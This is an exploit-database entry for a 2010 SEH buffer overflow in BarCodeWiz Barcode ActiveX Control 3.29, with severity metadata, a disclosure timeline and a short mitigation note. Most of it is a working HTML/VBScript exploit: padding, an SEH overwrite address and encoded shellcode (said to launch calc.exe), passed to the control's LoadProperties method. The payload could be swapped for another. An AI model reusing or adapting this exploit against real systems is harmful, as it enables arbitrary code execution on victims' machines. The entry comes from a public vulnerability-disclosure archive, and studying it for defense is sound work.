BarCodeWiz Barcode ActiveX Control 3.29 BoF (SEH)

vendor:

BarCodeWiz Barcode ActiveX Control

by:

loneferret

7.5

CVSS

HIGH

Buffer Overflow

CWE

Product Name: BarCodeWiz Barcode ActiveX Control

Affected Version From: BarCodeWiz Barcode ActiveX Control 3.29

Affected Version To: BarCodeWiz Barcode ActiveX Control 3.29

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows XP Professional SP3 with Internet Explorer 6

2010

BarCodeWiz Barcode ActiveX Control 3.29 BoF (SEH)

This exploit is a buffer overflow vulnerability found in BarCodeWiz Barcode ActiveX Control 3.29. It is triggered when the LoadProperties method is called. The vulnerability allows an attacker to execute arbitrary code on the target system.

Mitigation:

Update the BarCodeWiz Barcode ActiveX Control to a non-vulnerable version. Alternatively, disable or remove the ActiveX control from the system.

Source

Exploit-DB raw data:

# BarCodeWiz Barcode ActiveX Control 3.29 BoF (SEH)
# Bug found: 24th July 2010
# Author: loneferret
# Software: http://www.barcodewiz.com/
# Nods to exploit-db.com

# Vulnerable file BarCodeWiz.dll
# LoadProperties method

# Tested on: Windows XP Professional SP3 with Internet Explorer 6
# [Needs adjustment for Internet Explorer 7]

 
# Vendor contacted: 24th July 2010
# Vendor first reply: 26th July 2010: Wanting more information
# Vendor contacted: 26th July 2010: Sent 2 proof of concepts files
# Vendor contacted: 29 July 2010: Asked for update
# No Response from vendor: 30 July 2010
# Public Release : 30 July 2010

#
# Shellcode calc.exe
# 

----HTML FILE FROM HERE ON-----

<html>
<object classid='clsid:CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6' id='target'></object>
<script language='vbscript'>

buffer = String(97,"A")
jmp = unescape("%eb%06%41%41")
SEH = unescape("%4b%f4%02%10")
shellcode=unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36")
shellcode=shellcode+unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41")
shellcode=shellcode+unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%34%42%30%42%30%42%50%4b%48%45%34%4e%53%4b%48%4e%47")
shellcode=shellcode+unescape("%45%30%4a%57%41%30%4f%4e%4b%58%4f%34%4a%31%4b%58%4f%35%42%42%41%30%4b%4e%49%54%4b%38%46%33%4b%38")
shellcode=shellcode+unescape("%41%30%50%4e%41%43%42%4c%49%49%4e%4a%46%38%42%4c%46%37%47%30%41%4c%4c%4c%4d%30%41%50%44%4c%4b%4e")
shellcode=shellcode+unescape("%46%4f%4b%43%46%35%46%42%46%50%45%47%45%4e%4b%58%4f%45%46%32%41%50%4b%4e%48%36%4b%38%4e%50%4b%54")
shellcode=shellcode+unescape("%4b%38%4f%35%4e%31%41%30%4b%4e%4b%58%4e%31%4b%38%41%30%4b%4e%49%38%4e%35%46%52%46%50%43%4c%41%33")
shellcode=shellcode+unescape("%42%4c%46%36%4b%48%42%44%42%53%45%58%42%4c%4a%37%4e%50%4b%38%42%44%4e%50%4b%48%42%47%4e%41%4d%4a")
shellcode=shellcode+unescape("%4b%48%4a%36%4a%30%4b%4e%49%30%4b%48%42%38%42%4b%42%50%42%50%42%50%4b%38%4a%46%4e%43%4f%35%41%43")
shellcode=shellcode+unescape("%48%4f%42%46%48%45%49%48%4a%4f%43%48%42%4c%4b%57%42%55%4a%56%42%4f%4c%38%46%50%4f%45%4a%36%4a%49")
shellcode=shellcode+unescape("%50%4f%4c%48%50%50%47%55%4f%4f%47%4e%43%36%41%56%4e%56%43%56%42%30%5a")
buffer2 = String(1552, "C")

arg1 = buffer + jmp + SEH + shellcode + buffer2

target.LoadProperties arg1

</script>

Barcodewiz 3.29
</html>